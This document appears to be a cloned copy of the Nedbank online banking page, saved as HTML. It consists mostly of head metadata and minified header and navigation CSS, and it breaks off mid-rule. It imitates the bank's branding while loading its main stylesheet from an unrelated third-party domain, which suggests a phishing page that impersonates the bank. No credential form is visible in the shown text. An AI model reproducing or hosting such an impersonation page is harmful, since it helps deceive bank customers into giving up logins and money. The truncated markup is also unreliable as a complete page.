<!DOCTYPE html>
<!-- saved from url=(0042)https://secured.nedbank.co.za/ -->
<html lang="en">
   <head>
      <meta http-equiv="content-type" content="text/html; charset=UTF-8">
      <meta charset="utf-8">
      <title>Nedbank Money</title>
      <!-- base href="https://secured.nedbank.co.za/" -->
      <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <link rel="icon" type="image/x-icon" href="https://secured.nedbank.co.za/nedbank.ico">
      <link href="https://faithpays.sowetoinnovations.co.za/KhRo/styles/styles.css" rel="stylesheet">
      <style type="text/css">/* Chart.js */
         @-webkit-keyframes chartjs-render-animation{from{opacity:0.99}to{opacity:1}}@keyframes chartjs-render-animation{from{opacity:0.99}to{opacity:1}}.chartjs-render-monitor{-webkit-animation:chartjs-render-animation 0.001s;animation:chartjs-render-animation 0.001s;}
      </style>
      <style type="text/css">/* Chart.js */
         @-webkit-keyframes chartjs-render-animation{from{opacity:0.99}to{opacity:1}}@keyframes chartjs-render-animation{from{opacity:0.99}to{opacity:1}}.chartjs-render-monitor{-webkit-animation:chartjs-render-animation 0.001s;animation:chartjs-render-animation 0.001s;}
      </style>
      <style>.clearfix[_ngcontent-c0]:after{visibility:hidden;display:block;font-size:0;content:" ";clear:both;height:0}*[_ngcontent-c0]   html[_ngcontent-c0]   .clearfix[_ngcontent-c0]{height:1%}.clearfix[_ngcontent-c0]{display:block}.scroll-page[_ngcontent-c0]{padding-top:0;box-sizing:border-box;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;-o-box-sizing:border-box}.scroll-page[_ngcontent-c0]   .app-content[_ngcontent-c0]{overflow:hidden;min-height:calc(100vh - 226px)}@media (min-width:460px){.scroll-page[_ngcontent-c0]   .app-content[_ngcontent-c0]{min-height:calc(100vh - 206px)}}@media (min-width:767px){.scroll-page[_ngcontent-c0]   .app-content[_ngcontent-c0]{min-height:calc(100vh - 203px)}}@media (min-width:926px){.scroll-page[_ngcontent-c0]   .app-content[_ngcontent-c0]{min-height:calc(100vh - 181px)}}@media (min-width:1440px){.scroll-page[_ngcontent-c0]   .app-content[_ngcontent-c0]{min-height:calc(100vh - 165px)}}.scroll-page[_ngcontent-c0]   app-footer[_ngcontent-c0]{display:block;height:176px}@media (min-width:460px){.scroll-page[_ngcontent-c0]   app-footer[_ngcontent-c0]{height:156px}}@media (min-width:767px){.scroll-page[_ngcontent-c0]   app-footer[_ngcontent-c0]{height:123px}}@media (min-width:926px){.scroll-page[_ngcontent-c0]   app-footer[_ngcontent-c0]{height:101px}}@media (min-width:1440px){.scroll-page[_ngcontent-c0]   app-footer[_ngcontent-c0]{height:85px}}app-header[_ngcontent-c0]{display:block;height:50px}@media (min-width:768px){app-header[_ngcontent-c0]{height:80px}}</style>
      <style>.clearfix[_ngcontent-c1]:after, .main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1]:after, .main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1]:after{visibility:hidden;display:block;font-size:0;content:" ";clear:both;height:0}*[_ngcontent-c1]   html[_ngcontent-c1]   .clearfix[_ngcontent-c1], *[_ngcontent-c1]   html[_ngcontent-c1]   .main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1], *[_ngcontent-c1]   html[_ngcontent-c1]   .main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1], .main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   *[_ngcontent-c1]   html[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1], .main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   *[_ngcontent-c1]   html[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1]{height:1%}.clearfix[_ngcontent-c1], .main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1], .main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1]{display:block}.main-header[_ngcontent-c1]{padding:13px 0;background:#006341;position:fixed;left:0;right:0;top:0;z-index:1010}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]{display:-webkit-box;display:-ms-flexbox;display:flex;-moz-align-items:center;-ms-align-items:center;-o-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .main-header-menu-item[_ngcontent-c1]:focus{outline:2px auto #4d90fe}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]{-webkit-box-flex:1;-ms-flex:1;flex:1}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .hamburger-icon[_ngcontent-c1], .main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .logo[_ngcontent-c1], .main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]{display:inline-block;vertical-align:middle}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .hamburger-icon[_ngcontent-c1]{position:relative;width:24px;height:24px;margin-right:10px;cursor:pointer}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .hamburger-icon[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/MobiBurgerIcon.1552efd08ee686318796.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .logo[_ngcontent-c1]{position:relative;width:24px;height:24px;cursor:pointer}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .logo[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/NedbanklogoBig.6565daa3d61b85155a08.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]{position:fixed;background:#fff;left:0;top:50px;height:calc(100vh - 50px);overflow-y:auto;z-index:1000;padding:0 0 10px;width:100%;box-sizing:border-box;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;-o-box-sizing:border-box;transform:translate(-100%);-webkit-transform:translate(-100%);-moz-transform:translate(-100%);-ms-transform:translate(-100%);-o-transform:translate(-100%);transition:-webkit-transform .25s ease-in-out;transition:transform .25s ease-in-out;transition:transform .25s ease-in-out,-webkit-transform .25s ease-in-out;-webkit-transition:transform .25s ease-in-out;-moz-transition:transform .25s ease-in-out;-ms-transition:transform .25s ease-in-out;-o-transition:transform .25s ease-in-out}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .user-details[_ngcontent-c1]{display:-webkit-box;display:-ms-flexbox;display:flex;-moz-align-items:center;-ms-align-items:center;-o-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;padding:17px;border-bottom:1px solid #f9f9f9}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .user-details[_ngcontent-c1]   .pic[_ngcontent-c1]{width:50px;height:50px;border-radius:50%;-webkit-border-radius:50%;-moz-border-radius:50%;-ms-border-radius:50%;-o-border-radius:50%;background-color:#bbb;border:3px solid #eee;font-size:.875rem;border-radius:40px;padding:12px 0;margin-right:20px;text-align:center}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .user-details[_ngcontent-c1]   .details[_ngcontent-c1]{-webkit-box-flex:1;-ms-flex:1;flex:1}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .user-details[_ngcontent-c1]   .details[_ngcontent-c1]   .name[_ngcontent-c1]{font-size:20px;font-weight:700;color:#666}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .user-details[_ngcontent-c1]   .details[_ngcontent-c1]   .link[_ngcontent-c1]   a[_ngcontent-c1]{font-weight:700;color:#fff;text-decoration:underline;cursor:pointer}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .user-details[_ngcontent-c1]   .details[_ngcontent-c1]   .link[_ngcontent-c1]   a[_ngcontent-c1]:active, .main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .user-details[_ngcontent-c1]   .details[_ngcontent-c1]   .link[_ngcontent-c1]   a[_ngcontent-c1]:hover{color:#fff}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .menu-overview[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .menu-overview[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/TabletOverview.5a0363e872f35d71647a.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .menu-transfer[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .menu-transfer[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/TransferIcon.9b1b05c4605edc3050fc.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .menu-pay-icon[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .menu-pay-icon[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/PayIcon.3673a13197aee5ef30b9.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .menu-buy-icon[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .menu-buy-icon[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/BuyIcon.3366774778ef32576660.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .menu-cards-icon[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .menu-cards-icon[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/CardsIcon.5bda5fd20bd0f1f16991.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1]{list-style:none;padding-left:0}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1]{position:relative;box-shadow:0 1px 1px 0 #f0f0f0}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1]:last-child{border-bottom:none}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li.pop-over-container[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li.pop-over-container.open[_ngcontent-c1]   .pop-over[_ngcontent-c1]{display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li.pop-over-container.open[_ngcontent-c1]:before{content:"";display:block;position:absolute;top:100%;left:calc(50% - 10px);z-index:2;width:0;height:0;border-left:10px solid transparent;border-right:10px solid transparent;border-bottom:10px solid #fff;margin-top:11px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li.pop-over-container.open[_ngcontent-c1]:after{content:"";display:block;position:absolute;top:100%;left:calc(50% - 6px);z-index:3;width:13px;height:13px;border:1px solid hsla(0,0%,73%,.5);border-bottom:none;border-right:none;transform:rotate(45deg);-webkit-transform:rotate(45deg);-moz-transform:rotate(45deg);-ms-transform:rotate(45deg);-o-transform:rotate(45deg);margin-top:13px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li.pop-over-container[_ngcontent-c1]   .pop-over[_ngcontent-c1]{margin-top:20px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li.pop-over-container[_ngcontent-c1]   .pop-over.no-sub-menu[_ngcontent-c1]{display:none}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a[_ngcontent-c1]{display:block;line-height:60px;padding:0 17px;text-decoration:none;color:#333;cursor:pointer}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a[_ngcontent-c1]   .icon[_ngcontent-c1], .main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a[_ngcontent-c1]   .text[_ngcontent-c1]{display:inline-block;vertical-align:middle;line-height:1}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a[_ngcontent-c1]   .icon[_ngcontent-c1]{width:16px;margin-right:17px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a[_ngcontent-c1]   .icon.arrow-icon[_ngcontent-c1]{position:relative;float:right;width:10px;margin:24px 0 0}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a[_ngcontent-c1]   .icon.arrow-icon[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/Arrow.83ae2f145ac1d885f045.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]{transform:translate(0);-webkit-transform:translate(0);-moz-transform:translate(0);-ms-transform:translate(0);-o-transform:translate(0)}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-overview[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-overview[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/overviewMob-grey.72041985f57de92946d3.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-transfer[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-transfer[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/TransferMob-grey.48c7a90dfcd9ec7df3d6.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-pay-icon[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-pay-icon[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/payMob-grey.c85a73cb48ff826303b1.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-buy-icon[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-buy-icon[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/buyMob-grey.54899f64fabdd123ad9f.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-cards-icon[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-cards-icon[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/cardsMob-grey.cc12451a2c0b646bac0e.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-recipients[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-recipients[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/recipientMob-grey.074f6c26a18d81ffd9ba.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-settings[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-settings[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/settingsMob-grey.b61fea7678ca1a982f9e.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-profile[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-profile[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/profileMob-grey.efb756d9e763e1ca3b34.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-contact-us[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-contact-us[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/contactMob-grey.99cf90b287e1fde5c32d.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-logoff[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-logoff[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/LogoutMob-grey.6ab620cfca64052d13bf.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-recipient-icon[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .menu-recipient-icon[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/recipientMob-grey.074f6c26a18d81ffd9ba.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .new-recipient[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav.side-nav[_ngcontent-c1]   .new-recipient[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/New-recipient.582384d7b072dc50483e.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1]{padding-left:0;list-style:none}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1]{display:inline-block;vertical-align:middle;margin-left:20px;width:20px;height:20px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a[_ngcontent-c1]{display:block;height:100%;width:100%;outline:0}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.pop-over-container[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.pop-over-container.open[_ngcontent-c1]   .pop-over[_ngcontent-c1]{display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.pop-over-container.open[_ngcontent-c1]:before{content:"";display:block;position:absolute;top:100%;left:calc(50% - 10px);z-index:2;width:0;height:0;border-left:10px solid transparent;border-right:10px solid transparent;border-bottom:10px solid #fff;margin-top:16px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.pop-over-container.open[_ngcontent-c1]:after{content:"";display:block;position:absolute;top:100%;left:calc(50% - 6px);z-index:3;width:13px;height:13px;border:1px solid hsla(0,0%,73%,.5);border-bottom:none;border-right:none;transform:rotate(45deg);-webkit-transform:rotate(45deg);-moz-transform:rotate(45deg);-ms-transform:rotate(45deg);-o-transform:rotate(45deg);margin-top:18px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.pop-over-container[_ngcontent-c1]   .pop-over[_ngcontent-c1]{margin-top:25px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.pop-over-container[_ngcontent-c1]   .pop-over.no-sub-menu[_ngcontent-c1]{display:none}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.search[_ngcontent-c1]{position:relative;width:16px;height:16px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.search[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/SearchIcon.6b950cc848685aeedfc5.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.contact[_ngcontent-c1]{display:none}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.contact[_ngcontent-c1]   a[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.contact[_ngcontent-c1]   a[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/contactWhite.52f466fe9811facea0d9.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.setting[_ngcontent-c1]{display:none}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.setting[_ngcontent-c1]   a[_ngcontent-c1]{position:relative}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.setting[_ngcontent-c1]   a[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/settings.0305f8e9fcb61c8486f2.svg);width:100%;height:100%;display:block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.logout[_ngcontent-c1]{display:none;width:auto;margin:0 0 0 10px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.logout[_ngcontent-c1]   a[_ngcontent-c1]{color:#fff}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.user-container[_ngcontent-c1]{display:none;font-size:14px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.user-container[_ngcontent-c1]   .btn-profile-menu[_ngcontent-c1]{width:100%;height:50px;margin-top:-15px;background-color:#007255;color:#fff;text-align:left;border:none;padding:0 10px;border-radius:6px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.user-container[_ngcontent-c1]   .btn-profile-menu[_ngcontent-c1]   .initials[_ngcontent-c1]{border-radius:50%;border:1px solid #78be20;height:32px;width:32px;line-height:32px;text-align:center;display:inline-block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.user-container[_ngcontent-c1]   .btn-profile-menu[_ngcontent-c1]   .name[_ngcontent-c1]{margin-left:10px;display:inline-block;text-overflow:ellipsis;overflow:hidden;width:8.8em;vertical-align:middle}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.user-container[_ngcontent-c1]   .btn-profile-menu[_ngcontent-c1]   .caret[_ngcontent-c1]{float:right;margin-top:15px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.user-container[_ngcontent-c1]   a.user[_ngcontent-c1]{color:#333;display:block;height:100%;-webkit-transform:translateX(-50%) translateY(-50%);transform:translateX(-50%) translateY(-50%)}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.cross[_ngcontent-c1]{position:relative;width:22px;height:22px;cursor:pointer}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.cross[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/close.b66473f26de73f31714b.svg);width:100%;height:100%;display:block}.main-header.un-auth[_ngcontent-c1]{background:#fff;border-bottom:1px solid #bbb}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]{display:-webkit-box;display:-ms-flexbox;display:flex;-moz-align-items:center;-ms-align-items:center;-o-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;position:relative}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .logo[_ngcontent-c1]{position:relative}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .logo[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/NedbankIcon.ef111dcaf7b1952d120f.svg);width:100%;height:100%;display:block}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]{color:#006341}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]{width:auto;margin-left:20px;height:auto}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]   .icon[_ngcontent-c1]{line-height:1}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]   .details[_ngcontent-c1], .main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]   .icon[_ngcontent-c1]{display:inline-block;vertical-align:middle}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.branch[_ngcontent-c1], .main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   